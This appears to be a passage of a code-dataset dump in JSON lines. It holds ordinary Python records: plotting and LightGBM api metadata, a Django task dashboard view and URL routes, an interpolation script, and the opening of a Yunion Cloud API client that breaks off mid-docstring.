"matplotlib.pyplot", "line_number": 512, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 513, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 513, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 521, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 521, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", 
"line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 522, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 523, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 523, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 524, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 524, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 525, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 525, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 532, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 532, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 533, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 533, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 534, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 534, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 535, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 535, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 536, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 536, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 543, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 543, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 544, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 544, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 545, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 545, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 546, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 546, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 547, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 547, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 554, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 554, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 555, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 555, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 556, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 556, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 557, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 557, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 605, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 605, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 606, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 606, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 607, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 607, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 608, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 608, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 614, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 614, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 615, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 615, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 616, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 616, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 617, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 617, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 626, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 626, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 628, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 628, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 629, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 629, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 657, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 657, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 658, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 658, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 659, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 660, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 660, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 675, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 675, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 678, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 678, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 681, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 691, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 691, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 699, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 699, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 709, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 709, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 717, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 717, "usage_type": "name"}, {"api_name": "pandas.merge", "line_number": 732, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 740, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 740, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 741, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 741, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 742, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot.title", "line_number": 743, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 743, "usage_type": "name"}, {"api_name": "datetime.date", "line_number": 773, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 774, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 782, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 816, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 829, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 895, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 920, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 942, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 956, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 990, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1000, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1001, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 1002, "usage_type": "call"}, {"api_name": "scipy.stats.uniform", "line_number": 1003, "usage_type": "call"}, {"api_name": "lightgbm.reset_parameter", "line_number": 1010, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1015, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 1016, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1030, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1045, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1046, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1055, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 1060, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1061, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1061, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 1062, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1062, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 1063, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1063, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 1064, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1064, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1065, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1065, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 1066, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1066, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1073, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 1075, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 1084, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1102, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1103, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1103, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1104, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1107, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1116, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1118, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1119, "usage_type": "call"}, {"api_name": "lightgbm.LGBMClassifier", "line_number": 1133, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 1139, "usage_type": "call"}, {"api_name": "sklearn.ensemble.VotingClassifier", "line_number": 1160, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 1166, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 1193, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.LabelEncoder", "line_number": 1198, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.Parallel", "line_number": 1204, "usage_type": "call"}, {"api_name": "sklearn.externals.joblib.delayed", "line_number": 1205, "usage_type": "call"}, {"api_name": "sklearn.base.clone", "line_number": 1205, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 1217, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 1222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1233, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1233, "usage_type": "name"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 1239, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 1240, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1248, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1248, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1249, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1249, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1250, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1250, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 1251, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1251, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 1252, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1252, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1253, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1253, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 1262, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 1264, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 1265, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1285, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 1288, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1297, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1299, "usage_type": "call"}, {"api_name": 
"time.time", "line_number": 1301, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1303, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1307, "usage_type": "call"}, {"api_name": "time.time", "line_number": 1310, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 1317, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1317, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 1318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1319, "usage_type": "name"}]}
+{"seq_id": "19575685423", "text": "from django.shortcuts import render\nfrom task_manager.tasks.models import Task\nfrom task_manager.projects.models import Project\n\n\ndef dashboard_view(request):\n # Общие данные\n total_tasks = Task.objects.count()\n total_open_tasks = Task.objects.exclude(status__name=\"завершена\").count()\n\n # Данные по проектам\n projects_data = []\n for project in Project.objects.all():\n project_tasks = Task.objects.filter(project=project)\n project_open_tasks = project_tasks.exclude(status__name=\"завершена\")\n projects_data.append({\n 'project_name': project.name,\n 'total_tasks': project_tasks.count(),\n 'open_tasks': project_open_tasks.count(),\n })\n\n context = {\n 'total_tasks': total_tasks,\n 'total_open_tasks': total_open_tasks,\n 'projects': projects_data,\n }\n\n return render(request, 'task_manager/dashboard.html', context)\n", "repo_name": "NikGor/TaskManager", "sub_path": "task_manager/dashboard/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 965, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "task_manager.tasks.models.Task.objects.count", "line_number": 8, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 8, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.exclude", "line_number": 9, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 9, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 9, "usage_type": "name"}, {"api_name": "task_manager.projects.models.Project.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "task_manager.projects.models.Project.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "task_manager.projects.models.Project", "line_number": 13, "usage_type": "name"}, {"api_name": "task_manager.tasks.models.Task.objects.filter", "line_number": 14, "usage_type": "call"}, {"api_name": "task_manager.tasks.models.Task.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "task_manager.tasks.models.Task", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}]}
+{"seq_id": "14829944383", "text": "from django.urls import path\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n TokenRefreshView,\n)\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\nfrom .views import UserRegisterView, UserLoginView, UserProfileView, UserView, BookingViewSet, PaymentViewSet\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"EV Charging Locator API\",\n default_version='v1',\n description=\"EV Charging Locator API\",\n terms_of_service=\"\",\n contact=openapi.Contact(email=\"\"),\n license=openapi.License(name=\"\"),\n ),\n public=True,\n permission_classes=[permissions.AllowAny],\n)\nurlpatterns = [\n path('swagger', schema_view.without_ui(cache_timeout=0), name='schema-json'),\n path('swagger/', schema_view.with_ui('swagger', cache_timeout=0), name='schema-swagger-ui'),\n path('redoc/', schema_view.with_ui('redoc', cache_timeout=0), name='schema-redoc'),\n path('register/', UserRegisterView.as_view(), name='user-register'),\n path('login/', UserLoginView.as_view(), name='user-login'),\n path('profile/', UserProfileView.as_view(), name='user-profile'),\n path('user/', UserView.as_view(), name='user'),\n path('bookings/', BookingViewSet.as_view({'post': 'create', 'get': 'list'}), name='bookings-list'),\n path('bookings//', BookingViewSet.as_view({'get': 'retrieve', 'put': 'update', 'delete': 'destroy'}), name='bookings-detail'),\n path('payment/', PaymentViewSet.as_view({'post': 'create'}), name='payment-create'),\n]\n \n \n", "repo_name": "nbanda2023/evproject", "sub_path": "api/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "drf_yasg.views.get_schema_view", "line_number": 12, "usage_type": "call"}, {"api_name": "drf_yasg.openapi.Info", "line_number": 13, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 13, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.Contact", "line_number": 18, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 18, "usage_type": "name"}, {"api_name": "drf_yasg.openapi.License", "line_number": 19, "usage_type": "call"}, {"api_name": "drf_yasg.openapi", "line_number": 19, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 22, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 22, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView.as_view", "line_number": 28, "usage_type": "call"}, {"api_name": "views.UserRegisterView", "line_number": 28, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView.as_view", "line_number": 29, "usage_type": "call"}, {"api_name": "views.UserLoginView", "line_number": 29, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView.as_view", "line_number": 30, "usage_type": "call"}, {"api_name": "views.UserProfileView", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", 
"line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView.as_view", "line_number": 31, "usage_type": "call"}, {"api_name": "views.UserView", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 32, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 32, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet.as_view", "line_number": 33, "usage_type": "call"}, {"api_name": "views.BookingViewSet", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet.as_view", "line_number": 34, "usage_type": "call"}, {"api_name": "views.PaymentViewSet", "line_number": 34, "usage_type": "name"}]}
+{"seq_id": "2252701539", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom math import sqrt\r\n\r\n# data from file 8\r\nx_points = np.array([ -1.2000000e+001,\r\n -1.0000000e+001,\r\n -8.0000000e+000,\r\n -6.0000000e+000,\r\n -4.0000000e+000,\r\n -2.0000000e+000,\r\n 0.0000000e+000,\r\n 2.0000000e+000,\r\n 4.0000000e+000,\r\n 6.0000000e+000,\r\n 8.0000000e+000])\r\n\r\ny_points = np.array([ -4.7169811e-002,\r\n -2.8571429e-002,\r\n -2.3809524e-002,\r\n -4.5454545e-002,\r\n-1.0000000e-001,\r\n -1.6666667e-001,\r\n-1.0000000e-001,\r\n -4.5454545e-002,\r\n -2.3809524e-002,\r\n-1.4285714e-002,\r\n -9.4339623e-003])\r\n\r\n\r\ndef divided_diff(x, y):\r\n n = len(y)\r\n coef = np.zeros([n, n])\r\n\r\n coef[:, 0] = y\r\n\r\n for j in range(1, n):\r\n for i in range(n - j):\r\n coef[i][j] = \\\r\n (coef[i + 1][j - 1] - coef[i][j - 1]) / (x[i + j] - x[i])\r\n\r\n return coef\r\n\r\ndef newton_poly(coef, x_data, x):\r\n n = len(x_data) - 1\r\n p = coef[n]\r\n for k in range(1,n+1):\r\n p = coef[n-k] + (x -x_data[n-k])*p\r\n return p\r\n\r\n\r\na_s = divided_diff(x_points, y_points)[0, :]\r\n\r\nx_new = np.arange(-12, 8.1, .1)\r\ny_new = newton_poly(a_s, x_points, x_new)\r\n\r\ndef cubic_interp1d(x0, x, y):\r\n\r\n x = np.asfarray(x)\r\n y = np.asfarray(y)\r\n\r\n if np.any(np.diff(x) < 0):\r\n indexes = np.argsort(x)\r\n x = x[indexes]\r\n y = y[indexes]\r\n\r\n size = len(x)\r\n\r\n xdiff = np.diff(x)\r\n ydiff = np.diff(y)\r\n\r\n Li = np.empty(size)\r\n Li_1 = np.empty(size-1)\r\n z = np.empty(size)\r\n\r\n Li[0] = sqrt(2*xdiff[0])\r\n Li_1[0] = 0.0\r\n B0 = 0.0\r\n z[0] = B0 / Li[0]\r\n\r\n for i in range(1, size-1, 1):\r\n Li_1[i] = xdiff[i-1] / Li[i-1]\r\n Li[i] = sqrt(2*(xdiff[i-1]+xdiff[i]) - Li_1[i-1] * Li_1[i-1])\r\n Bi = 6*(ydiff[i]/xdiff[i] - ydiff[i-1]/xdiff[i-1])\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n i = size - 1\r\n Li_1[i-1] = xdiff[-1] / Li[i-1]\r\n Li[i] = sqrt(2*xdiff[-1] - Li_1[i-1] * Li_1[i-1])\r\n Bi = 0.0\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n\r\n i = size-1\r\n z[i] = z[i] / Li[i]\r\n for i in range(size-2, -1, -1):\r\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\r\n\r\n index = x.searchsorted(x0)\r\n np.clip(index, 1, size-1, index)\r\n\r\n xi1, xi0 = x[index], x[index-1]\r\n yi1, yi0 = y[index], y[index-1]\r\n zi1, zi0 = z[index], z[index-1]\r\n hi1 = xi1 - xi0\r\n\r\n f0 = zi0/(6*hi1)*(xi1-x0)**3 + \\\r\n zi1/(6*hi1)*(x0-xi0)**3 + \\\r\n (yi1/hi1 - zi1*hi1/6)*(x0-xi0) + \\\r\n (yi0/hi1 - zi0*hi1/6)*(xi1-x0)\r\n return f0\r\n\r\nplt.figure(figsize = (12, 8))\r\nplt.scatter(x_points, y_points)\r\nplt.plot(x_points, y_points, 'bo')\r\nplt.plot(x_new, y_new)\r\nX_new = np.linspace(-12, 2.1, 201)\r\nplt.plot(x_new, cubic_interp1d(x_new, x_points, y_points))\r\nplt.show()\r\n", "repo_name": "kopczyn12/numerical-methods", "sub_path": "interpolation_methods/mn8.py", "file_name": "mn8.py", "file_ext": "py", "file_size_in_byte": 2779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 62, "usage_type": "call"}, 
{"api_name": "numpy.diff", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 74, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]}
+{"seq_id": "43238082118", "text": "import logging\nimport json\n\nfrom yunionclient.common import http\n\nfrom yunionclient.api import zones\nfrom yunionclient.api import keypairs\nfrom yunionclient.api import hosts\nfrom yunionclient.api import wires\nfrom yunionclient.api import hostwires\nfrom yunionclient.api import storages\nfrom yunionclient.api import hoststorages\n\nfrom yunionclient.api import networks\nfrom yunionclient.api import disks\nfrom yunionclient.api import guests\nfrom yunionclient.api import guestdisks\nfrom yunionclient.api import guestnetworks\nfrom yunionclient.api import groupnetworks\n\nfrom yunionclient.api import groupguests\n\nfrom yunionclient.api import flavors\n\nfrom yunionclient.api import usages\n\nfrom yunionclient.api import logs\n\nfrom yunionclient.api import images\n\nfrom yunionclient.api import vncproxy\n\nfrom yunionclient.api import sshrelay\n\nfrom yunionclient.api import quotas\n\nfrom yunionclient.api import secgroups\n\nfrom yunionclient.api import dnsrecords\n\nfrom yunionclient.api import baremetalagents\nfrom yunionclient.api import baremetals\nfrom yunionclient.api import baremetalnetworks\nfrom yunionclient.api import baremetalstorages\n\nfrom yunionclient.api import reservedips\n\nfrom yunionclient.api import scheduler\n\nfrom yunionclient.api.stats import RegionStatsManager\n\nfrom yunionclient.api.tenantinfo import TenantInfo, TenantInfoManager\n\nfrom yunionclient.api import users\nfrom yunionclient.api import tenants\nfrom yunionclient.api import projects\nfrom yunionclient.api import groups\nfrom yunionclient.api import roles\nfrom yunionclient.api import groupusers\n\nfrom yunionclient.api import ec2credentials\nfrom yunionclient.api import services\nfrom yunionclient.api import endpoints\nfrom yunionclient.api import schedtags\nfrom yunionclient.api import metadatas\nfrom yunionclient.api import loadbalancers\n\nlogger = logging.getLogger(__name__)\n\n\nclass Client(http.HTTPClient):\n \"\"\"Client for Yunion Cloud API\n \"\"\"\n\n def __init__(self, auth_url, username, password, domain_name,\n region=None, zone=None, endpoint_type='internalURL',\n timeout=600, insecure=False):\n \"\"\" Initialize a new client for the Images v1 API. 
